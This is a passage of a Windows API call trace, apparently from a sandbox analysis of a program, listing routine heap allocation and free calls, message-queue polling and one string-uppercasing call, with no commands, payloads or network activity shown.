hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0172.411] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0172.411] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0172.411] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0172.411] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec90 | out: hHeap=0x8a0000) returned 1 [0172.411] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0172.411] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0172.411] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0172.411] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0172.411] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0172.411] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0172.411] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0172.411] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0172.411] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0172.411] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0172.411] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0172.411] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0172.412] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0172.412] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0172.412] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0172.412] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0172.412] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0172.412] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0172.412] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0172.412] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0172.412] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0172.412] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0172.412] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0172.412] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0172.412] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0172.412] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0172.412] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0172.412] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0172.412] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0172.412] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0172.412] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0b78 | out: hHeap=0x8a0000) returned 1 [0172.412] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0172.412] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.412] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26f8 [0172.412] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0172.412] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0172.412] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0172.413] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0172.413] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0172.413] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0172.413] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0172.413] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0172.413] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0172.413] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0172.413] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d460 [0172.413] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0172.413] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0172.413] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d460 | out: hHeap=0x8a0000) returned 1 [0172.413] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0172.413] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0172.413] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0172.413] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.413] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26f8 [0172.413] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0172.413] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0172.413] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0172.413] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0172.413] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0172.413] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0172.413] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0172.414] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deee8 | out: hHeap=0x8a0000) returned 1 [0172.414] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0172.414] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0172.414] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0172.414] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deec0 | out: hHeap=0x8a0000) returned 1 [0172.414] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0172.414] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df168 | out: hHeap=0x8a0000) returned 1 [0172.414] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0172.414] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded80 | out: hHeap=0x8a0000) returned 1 [0172.414] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0172.414] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0172.414] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0172.414] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df000 | out: hHeap=0x8a0000) returned 1 [0172.414] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0172.414] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0172.414] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0172.414] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0c8 | out: hHeap=0x8a0000) returned 1 [0172.414] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0172.414] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0172.414] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0172.414] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec40 | out: hHeap=0x8a0000) returned 1 [0172.414] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0172.414] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df140 | out: hHeap=0x8a0000) returned 1 [0172.414] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0172.414] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def38 | out: hHeap=0x8a0000) returned 1 [0172.414] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0172.415] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0172.415] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedd0 | out: hHeap=0x8a0000) returned 1 [0172.415] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0172.415] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded30 | out: hHeap=0x8a0000) returned 1 [0172.415] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0172.415] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0172.415] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0172.415] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defb0 | out: hHeap=0x8a0000) returned 1 [0172.415] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0172.415] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0172.415] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0172.415] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded58 | out: hHeap=0x8a0000) returned 1 [0172.415] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0172.415] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ee038 | out: hHeap=0x8a0000) returned 1 [0172.415] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0172.415] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0172.415] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0172.415] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0172.415] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0172.415] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0172.415] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0172.415] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0172.415] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0172.415] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df028 | out: hHeap=0x8a0000) returned 1 [0172.415] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0172.416] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0172.416] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0172.416] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0172.416] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0172.416] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0172.416] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0172.416] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0172.416] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0172.416] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0172.416] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df1e0 | out: hHeap=0x8a0000) returned 1 [0172.416] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0172.416] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0172.416] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0172.416] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0172.416] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dece0 | out: hHeap=0x8a0000) returned 1 [0172.416] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0172.416] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dece0 [0172.416] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0172.416] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0172.416] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0172.416] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0172.416] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0172.416] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0172.416] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0172.417] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf310 | out: hHeap=0x8a0000) returned 1 [0172.417] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0172.417] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df1e0 [0172.417] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1b10 [0172.417] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0172.417] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0172.417] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0172.417] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0172.417] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e18f0 [0172.417] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0172.417] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0172.417] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df028 [0172.417] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0172.417] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0172.417] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d440 [0172.417] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x24) returned 0x8dc168 [0172.417] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0172.417] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0172.417] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0172.417] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0172.417] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0172.417] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dc168 | out: hHeap=0x8a0000) returned 1 [0172.417] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0172.417] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0172.418] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df028 | out: hHeap=0x8a0000) returned 1 [0172.418] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0172.418] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1970 [0172.418] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0172.418] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0172.418] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0172.418] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1b60 [0172.418] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0172.418] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bdaf8 [0172.418] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df028 [0172.418] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0172.418] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0172.418] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0172.418] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded58 [0172.418] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0172.418] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0172.418] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0172.418] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defb0 [0172.418] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0172.418] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0172.418] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0172.418] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded30 [0172.418] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0172.419] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedd0 [0172.419] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0172.419] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0172.419] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0172.419] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def38 [0172.419] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0172.419] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0172.419] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df140 [0172.419] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0172.419] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0172.419] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0172.419] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec40 [0172.419] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0172.419] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0172.419] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0172.419] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0c8 [0172.419] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0172.419] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2618 [0172.419] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0172.420] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0172.420] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2828 [0172.420] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0172.420] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df000 [0172.420] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0172.420] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2638 [0172.420] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0172.420] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0172.420] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0172.420] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2638 [0172.420] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0172.420] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0172.420] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0172.420] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2638 [0172.420] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0172.420] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0172.420] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0172.420] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2638 [0172.420] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0172.421] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0172.421] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0172.421] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2638 [0172.421] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0172.421] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0172.421] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2638 [0172.421] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0172.421] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, 